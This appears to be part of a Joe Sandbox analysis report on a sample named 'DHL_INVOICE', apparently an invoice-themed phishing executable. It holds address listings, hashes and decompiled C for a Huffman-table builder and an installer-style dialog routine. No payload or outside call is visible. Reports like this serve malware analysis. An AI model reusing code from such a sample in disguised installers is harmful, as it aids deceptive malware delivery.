                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040766c
                                                                            0x0040766c
                                                                            0x0040766f
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407dd9
                                                                            0x00407dd9
                                                                            0x00407dde
                                                                            0x00407de4
                                                                            0x00407de9
                                                                            0x00407def
                                                                            0x00407df5
                                                                            0x00407df9
                                                                            0x00407dfb
                                                                            0x00407f18
                                                                            0x00407f18
                                                                            0x00407f1c
                                                                            0x00407f1c
                                                                            0x00407f21
                                                                            0x00407f27
                                                                            0x00407f2b
                                                                            0x00407f31
                                                                            0x00000000
                                                                            0x00407f31
                                                                            0x00407e01
                                                                            0x00407e01
                                                                            0x00407e07
                                                                            0x00407e09
                                                                            0x00407e0b
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407e11
                                                                            0x00407e11
                                                                            0x00407e17
                                                                            0x00407e19
                                                                            0x00407e1c
                                                                            0x00407ef7
                                                                            0x00407ef7
                                                                            0x00407efb
                                                                            0x00407f01
                                                                            0x00407f05
                                                                            0x00407f0b
                                                                            0x00407f0e
                                                                            0x00000000
                                                                            0x00407f0e
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004072f1
                                                                            0x00000000
                                                                            0x00407e31
                                                                            0x00407a92
                                                                            0x00407a92
                                                                            0x00407a9c
                                                                            0x00000000
                                                                            0x00407a9c
                                                                            0x00407a70
                                                                            0x00407a72
                                                                            0x00407a75
                                                                            0x00407a80
                                                                            0x00407a83
                                                                            0x00000000
                                                                            0x00407a83
                                                                            0x00407a5a
                                                                            0x00407a5e
                                                                            0x00407a61
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004079bc
                                                                            0x00407762
                                                                            0x00407794
                                                                            0x00407794
                                                                            0x00407794
                                                                            0x0040779c
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040779e
                                                                            0x004077a6
                                                                            0x004077ac
                                                                            0x004077b3
                                                                            0x004077b8
                                                                            0x004077bc
                                                                            0x004077c0
                                                                            0x004077c7
                                                                            0x004077e7
                                                                            0x004077ea
                                                                            0x004077f1
                                                                            0x004077ec
                                                                            0x004077ee
                                                                            0x004077ee
                                                                            0x004077f4
                                                                            0x004077fa
                                                                            0x004077fd
                                                                            0x004077fe
                                                                            0x00407801
                                                                            0x00407805
                                                                            0x0040780d
                                                                            0x0040780f
                                                                            0x00407815
                                                                            0x00407846
                                                                            0x0040784a
                                                                            0x0040785a
                                                                            0x00407864
                                                                            0x00407866
                                                                            0x0040786b
                                                                            0x0040786e
                                                                            0x00407888
                                                                            0x0040788e
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407894
                                                                            0x00407899
                                                                            0x0040789d
                                                                            0x004078b2
                                                                            0x004078b2
                                                                            0x004078b2
                                                                            0x004078b7
                                                                            0x004078b7
                                                                            0x004078be
                                                                            0x004078c1
                                                                            0x004078c1
                                                                            0x004078c1
                                                                            0x004078c2
                                                                            0x004078c4
                                                                            0x004078c4
                                                                            0x004078c9
                                                                            0x004078c9
                                                                            0x004078ce
                                                                            0x004078d2
                                                                            0x004078d5
                                                                            0x004078d5
                                                                            0x004078d9
                                                                            0x004078de
                                                                            0x004078f6
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004078f6
                                                                            0x0040789f
                                                                            0x004078a2
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004078a8
                                                                            0x004078ac
                                                                            0x00000000
                                                                            0x00407817
                                                                            0x00407817
                                                                            0x00407817
                                                                            0x00407817
                                                                            0x0040781d
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407823
                                                                            0x00407824
                                                                            0x00407826
                                                                            0x0040782a
                                                                            0x00407836
                                                                            0x00407838
                                                                            0x00407840
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407842
                                                                            0x00407842
                                                                            0x00000000
                                                                            0x00407842
                                                                            0x00000000
                                                                            0x00407817
                                                                            0x00407815
                                                                            0x004077c9
                                                                            0x004077cc
                                                                            0x004077d0
                                                                            0x004077d2
                                                                            0x004077d8
                                                                            0x004077dc
                                                                            0x004077df
                                                                            0x00000000
                                                                            0x004077df
                                                                            0x0040776f
                                                                            0x0040776f
                                                                            0x00407775
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040777b
                                                                            0x0040777e
                                                                            0x0040778b
                                                                            0x0040778d
                                                                            0x00407791
                                                                            0x00000000
                                                                            0x00407791
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004076dd
                                                                            0x004076dd
                                                                            0x004076e0
                                                                            0x004076e7
                                                                            0x004076ec
                                                                            0x004076ef
                                                                            0x00000000
                                                                            0x004076dd
                                                                            0x0040766c
                                                                            0x00407640

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1081094876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.1081063184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081164025.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081710560.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_DHL_INVOICE.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 9a6e5cab2d0bf7698bdae054db21990c31fcebd81f7c740a7b631921d0cd6e3b
                                                                            • Instruction ID: 34855fb2682deb8042092b43f828aa3e625fb4f43d1e7d882369f70b8a17060e
                                                                            • Opcode Fuzzy Hash: 9a6e5cab2d0bf7698bdae054db21990c31fcebd81f7c740a7b631921d0cd6e3b
                                                                            • Instruction Fuzzy Hash: 09F17171A183418FCB04CF18C49076ABBE5FF89315F14896EE889EB286D778E941CF56
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 96%
                                                                            			E00406EA8(signed int* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr* _a24, signed int* _a28, intOrPtr _a32, signed int* _a36) {
                                                                            				signed int _v60;
                                                                            				signed int _v120;
                                                                            				signed int _v124;
                                                                            				void _v188;
                                                                            				intOrPtr _v192;
                                                                            				signed int _v196;
                                                                            				signed int _v200;
                                                                            				signed int _v204;
                                                                            				signed int _v208;
                                                                            				signed int _v212;
                                                                            				signed int _v216;
                                                                            				signed int _v220;
                                                                            				signed int _v224;
                                                                            				void* _v228;
                                                                            				signed int _v232;
                                                                            				signed int _v236;
                                                                            				signed int _v240;
                                                                            				signed int _v244;
                                                                            				short _v246;
                                                                            				char _v247;
                                                                            				signed char _v248;
                                                                            				signed int _t170;
                                                                            				void* _t172;
                                                                            				signed int _t173;
                                                                            				signed int _t176;
                                                                            				signed int _t179;
                                                                            				signed int _t180;
                                                                            				signed int _t183;
                                                                            				signed int _t184;
                                                                            				signed int _t189;
                                                                            				intOrPtr* _t203;
                                                                            				signed int _t204;
                                                                            				short _t209;
                                                                            				signed int _t216;
                                                                            				signed char _t227;
                                                                            				signed int _t233;
                                                                            				signed int* _t237;
                                                                            				signed int _t239;
                                                                            				signed int _t240;
                                                                            				signed int* _t242;
                                                                            				signed int _t244;
                                                                            				signed int _t246;
                                                                            				signed int _t247;
                                                                            				signed int _t248;
                                                                            				signed int _t249;
                                                                            				signed char _t251;
                                                                            				intOrPtr _t253;
                                                                            				signed int _t254;
                                                                            				signed int _t260;
                                                                            				signed int _t262;
                                                                            				signed char _t264;
                                                                            				intOrPtr _t265;
                                                                            				signed int _t266;
                                                                            				void* _t267;
                                                                            				signed int _t268;
                                                                            				signed int _t269;
                                                                            				signed int _t272;
                                                                            				signed int _t274;
                                                                            				signed int _t276;
                                                                            				signed int _t279;
                                                                            				void* _t280;
                                                                            				void* _t281;
                                                                            				signed int _t283;
                                                                            				signed int _t284;
                                                                            				signed int* _t287;
                                                                            				signed int _t290;
                                                                            				void* _t291;
                                                                            				intOrPtr _t292;
                                                                            				signed int _t293;
                                                                            				signed int _t294;
                                                                            				signed int _t295;
                                                                            				intOrPtr _t297;
                                                                            				signed int _t299;
                                                                            				intOrPtr _t300;
                                                                            				signed int _t301;
                                                                            				void* _t304;
                                                                            				signed int _t308;
                                                                            				signed char* _t310;
                                                                            
                                                                            				_t237 = _a4;
                                                                            				_t297 = _a8;
                                                                            				_t265 = _t297;
                                                                            				_t240 = 0x10;
                                                                            				memset( &_v188, 0, _t240 << 2);
                                                                            				_t310 =  &(( &_v248)[0xc]);
                                                                            				_t242 = _t237;
                                                                            				do {
                                                                            					_t170 =  *_t242;
                                                                            					_t242 =  &(_t242[1]);
                                                                            					_t310[0x4c + _t170 * 4] = _t310[0x4c + _t170 * 4] + 1;
                                                                            					_t265 = _t265 - 1;
                                                                            				} while (_t265 != 0);
                                                                            				if(_v188 == _t297) {
                                                                            					 *_a24 = 0;
                                                                            					 *_a28 = 0;
                                                                            					return 0;
                                                                            				}
                                                                            				_t287 = _a28;
                                                                            				_t244 = 1;
                                                                            				_t294 = 0;
                                                                            				_t266 = 0xf;
                                                                            				while(_t310[0x4c + _t244 * 4] == _t294) {
                                                                            					_t244 = _t244 + 1;
                                                                            					if(_t244 <= _t266) {
                                                                            						continue;
                                                                            					}
                                                                            					break;
                                                                            				}
                                                                            				_v220 = _t244;
                                                                            				_t172 =  >=  ?  *_t287 : _t244;
                                                                            				while(_t310[0x4c + _t266 * 4] == _t294) {
                                                                            					_t266 = _t266 - 1;
                                                                            					if(_t266 != 0) {
                                                                            						continue;
                                                                            					}
                                                                            					break;
                                                                            				}
                                                                            				_v216 = _t266;
                                                                            				_t299 =  <=  ? _t172 : _t266;
                                                                            				_t173 = _t299;
                                                                            				_v236 = _t299;
                                                                            				_t300 = _a8;
                                                                            				 *_t287 = _t173;
                                                                            				_t290 = 1 << _t244;
                                                                            				while(_t244 < _t266) {
                                                                            					_t291 = _t290 - _t310[0x4c + _t244 * 4];
                                                                            					if(_t291 < 0) {
                                                                            						L61:
                                                                            						return _t173 | 0xffffffff;
                                                                            					}
                                                                            					_t244 = _t244 + 1;
                                                                            					_t290 = _t291 + _t291;
                                                                            				}
                                                                            				_t246 = _t266 << 2;
                                                                            				_v212 = _t246;
                                                                            				_t173 = _t310[_t246 + 0x4c];
                                                                            				_t292 = _t290 - _t173;
                                                                            				_v192 = _t292;
                                                                            				if(_t292 < 0) {
                                                                            					goto L61;
                                                                            				}
                                                                            				_v120 = _t294;
                                                                            				_t310[_t246 + 0x4c] = _t173 + _t292;
                                                                            				_t247 = _t294;
                                                                            				_t267 = _t266 - 1;
                                                                            				if(_t267 != 0) {
                                                                            					_t233 = _t294;
                                                                            					do {
                                                                            						_t247 = _t247 + _t310[_t233 + 0x50];
                                                                            						_t233 = _t233 + 4;
                                                                            						_t310[_t233 + 0x90] = _t247;
                                                                            						_t267 = _t267 - 1;
                                                                            					} while (_t267 != 0);
                                                                            				}
                                                                            				_t248 = _t294;
                                                                            				do {
                                                                            					_t268 =  *_t237;
                                                                            					_t237 =  &(_t237[1]);
                                                                            					if(_t268 != 0) {
                                                                            						_t176 = _t310[0x8c + _t268 * 4];
                                                                            						 *(0x4330a0 + _t176 * 4) = _t248;
                                                                            						_t310[0x8c + _t268 * 4] = _t176 + 1;
                                                                            					}
                                                                            					_t248 = _t248 + 1;
                                                                            				} while (_t248 < _t300);
                                                                            				_t301 = _t294;
                                                                            				_t249 = _v236;
                                                                            				_t269 = _v220;
                                                                            				_t239 =  ~_t249;
                                                                            				_v232 = _t301;
                                                                            				_t179 = _t310[_v212 + 0x8c];
                                                                            				_v196 = _t179;
                                                                            				_t180 = _t179 | 0xffffffff;
                                                                            				_v124 = _t294;
                                                                            				_v228 = 0x4330a0;
                                                                            				_v244 = _t180;
                                                                            				_v60 = _t294;
                                                                            				_v224 = _t294;
                                                                            				_v208 = _t294;
                                                                            				if(_t269 <= _v216) {
                                                                            					_t183 =  &_v188 + _t269 * 4;
                                                                            					_v204 = _t183;
                                                                            					do {
                                                                            						_t184 =  *_t183;
                                                                            						while(_t184 != 0) {
                                                                            							_v200 = _t184;
                                                                            							_v212 = _t184 - 1;
                                                                            							_t173 = _t249 + _t239;
                                                                            							while(1) {
                                                                            								_v240 = _t173;
                                                                            								if(_t269 <= _t173) {
                                                                            									break;
                                                                            								}
                                                                            								_v244 = _v244 + 1;
                                                                            								_t304 =  >  ? _t249 : _v216 - _t173;
                                                                            								_t251 = _t269 - _t173;
                                                                            								_t272 = 1 << _t251;
                                                                            								if(1 > _v200) {
                                                                            									_t280 = _t272 + (_t173 | 0xffffffff) - _v212;
                                                                            									_t173 = _v204;
                                                                            									if(_t251 < _t304) {
                                                                            										while(1) {
                                                                            											_t251 = _t251 + 1;
                                                                            											if(_t251 >= _t304) {
                                                                            												goto L31;
                                                                            											}
                                                                            											_t281 = _t280 + _t280;
                                                                            											_t173 = _t173 + 4;
                                                                            											if(_t281 >  *_t173) {
                                                                            												_t280 = _t281 -  *_t173;
                                                                            												continue;
                                                                            											}
                                                                            											goto L31;
                                                                            										}
                                                                            									}
                                                                            								}
                                                                            								L31:
                                                                            								_v208 = 1;
                                                                            								_t274 =  *_a36;
                                                                            								_t308 = (1 << _t251) + _t274;
                                                                            								if(1 > 0x5a0) {
                                                                            									goto L61;
                                                                            								}
                                                                            								_v224 = _a32 + _t274 * 4;
                                                                            								_t276 = _v244;
                                                                            								_t310[0xcc + _t276 * 4] = _v224;
                                                                            								 *_a36 = _t308;
                                                                            								_t189 = _v240;
                                                                            								_t301 = _v232;
                                                                            								if(_t276 == 0) {
                                                                            									 *_a24 = _v224;
                                                                            								} else {
                                                                            									_v247 = _v236;
                                                                            									_v248 = _t251;
                                                                            									_t310[0x8c + _t276 * 4] = _t301;
                                                                            									_t279 = _t301 >> _t239;
                                                                            									_t264 = _t310[0xc8 + _v244 * 4];
                                                                            									_v246 = (_v224 - _t264 >> 2) - _t279;
                                                                            									 *(_t264 + _t279 * 4) = _v248;
                                                                            									_t189 = _v240;
                                                                            								}
                                                                            								_t249 = _v236;
                                                                            								_t239 = _t189;
                                                                            								_t269 = _v220;
                                                                            								_t173 = _t189 + _t249;
                                                                            							}
                                                                            							_v247 = _t269 - _t239;
                                                                            							if(_v228 < 0x4330a0 + _v196 * 4) {
                                                                            								_t203 = _v228;
                                                                            								_t253 =  *_t203;
                                                                            								_t204 = _t203 + 4;
                                                                            								_v232 = _t204;
                                                                            								if(_t253 >= _a12) {
                                                                            									_t254 = _t253 - _a12;
                                                                            									_v248 =  *((intOrPtr*)(_a20 + _t254 * 2)) + 0x50;
                                                                            									_t209 =  *((intOrPtr*)(_a16 + _t254 * 2));
                                                                            								} else {
                                                                            									_v248 = (_t204 & 0xffffff00 | _t253 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
                                                                            									_t209 =  *_v228;
                                                                            								}
                                                                            								_v246 = _t209;
                                                                            								_v228 = _v232;
                                                                            							} else {
                                                                            								_v248 = 0xc0;
                                                                            							}
                                                                            							_v200 = 1 << _t269 - _t239;
                                                                            							_t283 = _t301 >> _t239;
                                                                            							if(_t283 < _v208) {
                                                                            								_t227 = _v248;
                                                                            								_t262 = _v200;
                                                                            								_t293 = _v224;
                                                                            								do {
                                                                            									 *(_t293 + _t283 * 4) = _t227;
                                                                            									_t283 = _t283 + _t262;
                                                                            								} while (_t283 < _v208);
                                                                            								_t292 = _v192;
                                                                            								_t294 = 0;
                                                                            							}
                                                                            							_t269 = _v220;
                                                                            							_t216 = 1 << _t269 - 1;
                                                                            							while((_t301 & _t216) != 0) {
                                                                            								_t301 = _t301 ^ _t216;
                                                                            								_t216 = _t216 >> 1;
                                                                            							}
                                                                            							_t301 = _t301 ^ _t216;
                                                                            							_v232 = _t301;
                                                                            							_t260 = _v244;
                                                                            							if(((1 << _t239) - 0x00000001 & _t301) != _t310[0x8c + _t260 * 4]) {
                                                                            								_t284 = _v236;
                                                                            								_t295 = _t260;
                                                                            								do {
                                                                            									_t239 = _t239 - _t284;
                                                                            									_t295 = _t295 - 1;
                                                                            								} while (((1 << _t239) - 0x00000001 & _t301) != _t310[0x8c + _t295 * 4]);
                                                                            								_t269 = _v220;
                                                                            								_v244 = _t295;
                                                                            								_t294 = 0;
                                                                            							}
                                                                            							_t184 = _v212;
                                                                            							_t249 = _v236;
                                                                            						}
                                                                            						_t269 = _t269 + 1;
                                                                            						_t183 = _v204 + 4;
                                                                            						_v220 = _t269;
                                                                            						_v204 = _t183;
                                                                            					} while (_t269 <= _v216);
                                                                            					_t180 = _t183 | 0xffffffff;
                                                                            				}
                                                                            				if(_t292 == 0 || _v216 == 1) {
                                                                            					return _t294;
                                                                            				}
                                                                            				return _t180;
                                                                            			}

















































































                                                                            0x00406eb1
                                                                            0x00406eb9
                                                                            0x00406ec0
                                                                            0x00406ec6
                                                                            0x00406ecb
                                                                            0x00406ecb
                                                                            0x00406ecd
                                                                            0x00406ecf
                                                                            0x00406ecf
                                                                            0x00406ed1
                                                                            0x00406ed4
                                                                            0x00406ed8
                                                                            0x00406ed8
                                                                            0x00406ee1
                                                                            0x00406eec
                                                                            0x00406ef5
                                                                            0x00000000
                                                                            0x00406ef7
                                                                            0x00406efe
                                                                            0x00406f09
                                                                            0x00406f0a
                                                                            0x00406f0c
                                                                            0x00406f0d
                                                                            0x00406f13
                                                                            0x00406f16
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406f16
                                                                            0x00406f1c
                                                                            0x00406f20
                                                                            0x00406f23
                                                                            0x00406f29
                                                                            0x00406f2c
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406f2c
                                                                            0x00406f30
                                                                            0x00406f36
                                                                            0x00406f39
                                                                            0x00406f3b
                                                                            0x00406f3f
                                                                            0x00406f46
                                                                            0x00406f4b
                                                                            0x00406f5c
                                                                            0x00406f4f
                                                                            0x00406f53
                                                                            0x0040727e
                                                                            0x00000000
                                                                            0x0040727e
                                                                            0x00406f59
                                                                            0x00406f5a
                                                                            0x00406f5a
                                                                            0x00406f62
                                                                            0x00406f65
                                                                            0x00406f69
                                                                            0x00406f6d
                                                                            0x00406f6f
                                                                            0x00406f73
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406f7b
                                                                            0x00406f82
                                                                            0x00406f86
                                                                            0x00406f88
                                                                            0x00406f8b
                                                                            0x00406f8d
                                                                            0x00406f8f
                                                                            0x00406f8f
                                                                            0x00406f93
                                                                            0x00406f96
                                                                            0x00406f9d
                                                                            0x00406f9d
                                                                            0x00406f8f
                                                                            0x00406fa2
                                                                            0x00406fa4
                                                                            0x00406fa4
                                                                            0x00406fa6
                                                                            0x00406fab
                                                                            0x00406fad
                                                                            0x00406fb4
                                                                            0x00406fbc
                                                                            0x00406fbc
                                                                            0x00406fc3
                                                                            0x00406fc4
                                                                            0x00406fcc
                                                                            0x00406fce
                                                                            0x00406fd4
                                                                            0x00406fd8
                                                                            0x00406fda
                                                                            0x00406fde
                                                                            0x00406fe5
                                                                            0x00406fe9
                                                                            0x00406fec
                                                                            0x00406ff3
                                                                            0x00406ffb
                                                                            0x00406fff
                                                                            0x00407006
                                                                            0x0040700a
                                                                            0x00407012
                                                                            0x0040701c
                                                                            0x0040701f
                                                                            0x00407023
                                                                            0x00407023
                                                                            0x0040724a
                                                                            0x0040702a
                                                                            0x0040702f
                                                                            0x00407033
                                                                            0x00407128
                                                                            0x00407128
                                                                            0x0040712e
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040703f
                                                                            0x00407047
                                                                            0x0040704e
                                                                            0x00407051
                                                                            0x00407057
                                                                            0x00407060
                                                                            0x00407062
                                                                            0x00407068
                                                                            0x0040706a
                                                                            0x0040706a
                                                                            0x0040706d
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040706f
                                                                            0x00407071
                                                                            0x00407076
                                                                            0x00407078
                                                                            0x00000000
                                                                            0x00407078
                                                                            0x00000000
                                                                            0x00407076
                                                                            0x0040706a
                                                                            0x00407068
                                                                            0x0040707c
                                                                            0x00407088
                                                                            0x0040708c
                                                                            0x0040708e
                                                                            0x00407096
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004070a6
                                                                            0x004070aa
                                                                            0x004070b2
                                                                            0x004070c0
                                                                            0x004070c2
                                                                            0x004070c6
                                                                            0x004070cc
                                                                            0x0040711a
                                                                            0x004070ce
                                                                            0x004070d2
                                                                            0x004070da
                                                                            0x004070e0
                                                                            0x004070e9
                                                                            0x004070eb
                                                                            0x004070fd
                                                                            0x00407106
                                                                            0x00407109
                                                                            0x00407109
                                                                            0x0040711c
                                                                            0x00407120
                                                                            0x00407122
                                                                            0x00407126
                                                                            0x00407126
                                                                            0x00407138
                                                                            0x0040714b
                                                                            0x00407154
                                                                            0x00407158
                                                                            0x0040715a
                                                                            0x0040715d
                                                                            0x00407168
                                                                            0x00407184
                                                                            0x00407197
                                                                            0x004071a2
                                                                            0x0040716a
                                                                            0x00407177
                                                                            0x0040717f
                                                                            0x0040717f
                                                                            0x004071a6
                                                                            0x004071af
                                                                            0x0040714d
                                                                            0x0040714d
                                                                            0x0040714d
                                                                            0x004071c0
                                                                            0x004071c4
                                                                            0x004071ca
                                                                            0x004071cc
                                                                            0x004071d0
                                                                            0x004071d4
                                                                            0x004071d8
                                                                            0x004071d8
                                                                            0x004071db
                                                                            0x004071dd
                                                                            0x004071e3
                                                                            0x004071e7
                                                                            0x004071e7
                                                                            0x004071e9
                                                                            0x004071f3
                                                                            0x004071fb
                                                                            0x004071f7
                                                                            0x004071f9
                                                                            0x004071f9
                                                                            0x004071ff
                                                                            0x00407205
                                                                            0x0040720c
                                                                            0x0040721a
                                                                            0x0040721c
                                                                            0x00407220
                                                                            0x00407222
                                                                            0x00407224
                                                                            0x0040722b
                                                                            0x0040722f
                                                                            0x00407238
                                                                            0x0040723c
                                                                            0x00407240
                                                                            0x00407240
                                                                            0x00407242
                                                                            0x00407246
                                                                            0x00407246
                                                                            0x00407256
                                                                            0x00407257
                                                                            0x0040725a
                                                                            0x0040725e
                                                                            0x00407262
                                                                            0x0040726c
                                                                            0x0040726c
                                                                            0x00407271
                                                                            0x00000000
                                                                            0x0040727a
                                                                            0x0040728b

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1081094876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.1081063184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081164025.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081710560.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_DHL_INVOICE.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 8e392d6b6b0d8d2976783d3b417d62ef8802b8105719cbf52046bc6543515951
                                                                            • Instruction ID: 458c99329ba390570ae49b1fba58edefd6773494dbefaa897816e029df8d06ab
                                                                            • Opcode Fuzzy Hash: 8e392d6b6b0d8d2976783d3b417d62ef8802b8105719cbf52046bc6543515951
                                                                            • Instruction Fuzzy Hash: 11C16771A0C3458FC718DF28D580A6ABBE1BBC9304F148A3EE59997380D734E916CF96
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 94%
                                                                            			E00403D8A() {
                                                                            				struct HWND__* _t60;
                                                                            				intOrPtr _t61;
                                                                            				unsigned int _t66;
                                                                            				signed short* _t88;
                                                                            				unsigned int _t89;
                                                                            				long _t104;
                                                                            				intOrPtr _t117;
                                                                            				intOrPtr _t118;
                                                                            				int _t120;
                                                                            				signed int _t121;
                                                                            				struct HWND__* _t125;
                                                                            				int _t126;
                                                                            				int _t132;
                                                                            				intOrPtr _t135;
                                                                            				struct HWND__* _t137;
                                                                            				struct HWND__* _t138;
                                                                            				int _t139;
                                                                            				void* _t142;
                                                                            
                                                                            				if( *((intOrPtr*)(_t142 + 0x50)) != 0x110) {
                                                                            					_t139 =  *(_t142 + 0x68);
                                                                            					if( *(_t142 + 0x60) != 0x111) {
                                                                            						if( *(_t142 + 0x60) != 0x4e) {
                                                                            							if( *(_t142 + 0x60) == 0x40b) {
                                                                            								 *0x42dd5c =  *0x42dd5c + 1;
                                                                            							}
                                                                            							L25:
                                                                            							return E0040575B( *(_t142 + 0x68),  *(_t142 + 0x68), _t139);
                                                                            						}
                                                                            						_t60 = GetDlgItem( *(_t142 + 0x60), 0x3e8);
                                                                            						_t117 =  *((intOrPtr*)(_t139 + 8));
                                                                            						_t125 = _t60;
                                                                            						if(_t117 != 0x70b) {
                                                                            							L16:
                                                                            							if(_t117 != 0x700 ||  *((intOrPtr*)(_t139 + 0xc)) != 0x100) {
                                                                            								goto L25;
                                                                            							} else {
                                                                            								_t61 =  *((intOrPtr*)(_t139 + 0x10));
                                                                            								if(_t61 == 0xd) {
                                                                            									SendMessageW( *0x4349f8, 0x111, 1, 0);
                                                                            									_t61 =  *((intOrPtr*)(_t139 + 0x10));
                                                                            								}
                                                                            								if(_t61 == 0x1b) {
                                                                            									SendMessageW( *0x4349f8, 0x10, 0, 0);
                                                                            								}
                                                                            								return 1;
                                                                            							}
                                                                            						}
                                                                            						if( *((intOrPtr*)(_t139 + 0xc)) != 0x201) {
                                                                            							goto L25;
                                                                            						}
                                                                            						_t66 =  *(_t139 + 0x1c);
                                                                            						_t118 =  *((intOrPtr*)(_t139 + 0x18));
                                                                            						 *(_t142 + 0x14) = _t66;
                                                                            						 *(_t142 + 0x10) = _t118;
                                                                            						 *(_t142 + 0x18) = 0x4339a0;
                                                                            						if(_t66 - _t118 >= 0x800) {
                                                                            							goto L25;
                                                                            						}
                                                                            						SendMessageW(_t125, 0x44b, 0, _t142 + 0x10);
                                                                            						SetCursor(LoadCursorW(0, 0x7f02));
                                                                            						 *((intOrPtr*)(_t142 + 0x24)) =  *((intOrPtr*)(_t142 + 0x5c));
                                                                            						 *(_t142 + 0x2c) =  *(_t142 + 0x18);
                                                                            						 *((intOrPtr*)(_t142 + 0x24)) = 0x500;
                                                                            						 *(_t142 + 0x3c) = 1;
                                                                            						 *(_t142 + 0x2c) = L"open";
                                                                            						 *((intOrPtr*)(_t142 + 0x34)) = 0;
                                                                            						 *((intOrPtr*)(_t142 + 0x38)) = 0;
                                                                            						E004069F3(_t142 + 0x1c);
                                                                            						SetCursor(LoadCursorW(0, 0x7f00));
                                                                            						_t117 =  *((intOrPtr*)(_t139 + 8));
                                                                            						goto L16;
                                                                            					}
                                                                            					if( *(_t142 + 0x64) >> 0x10 == 0 &&  *0x42dd5c == 0) {
                                                                            						_t135 =  *0x42dd4c;
                                                                            						if(( *(_t135 + 0x14) & 0x00000020) != 0) {
                                                                            							_t120 = SendMessageW(GetDlgItem( *(_t142 + 0x6c), 0x40a), 0xf0, 0, 0) & 0x00000001;
                                                                            							 *(_t135 + 0x14) =  *(_t135 + 0x14) & 0xfffffffe | _t120;
                                                                            							EnableWindow( *0x42dd54, _t120);
                                                                            							E0040553C();
                                                                            						}
                                                                            					}
                                                                            					goto L25;
                                                                            				} else {
                                                                            					_t126 =  *(_t142 + 0x68);
                                                                            					_t121 =  *(_t126 + 0x30);
                                                                            					if(_t121 < 0) {
                                                                            						_t121 =  *( *0x4349e0 - 4 + _t121 * 4);
                                                                            					}
                                                                            					_push( *((intOrPtr*)(_t126 + 0x34)));
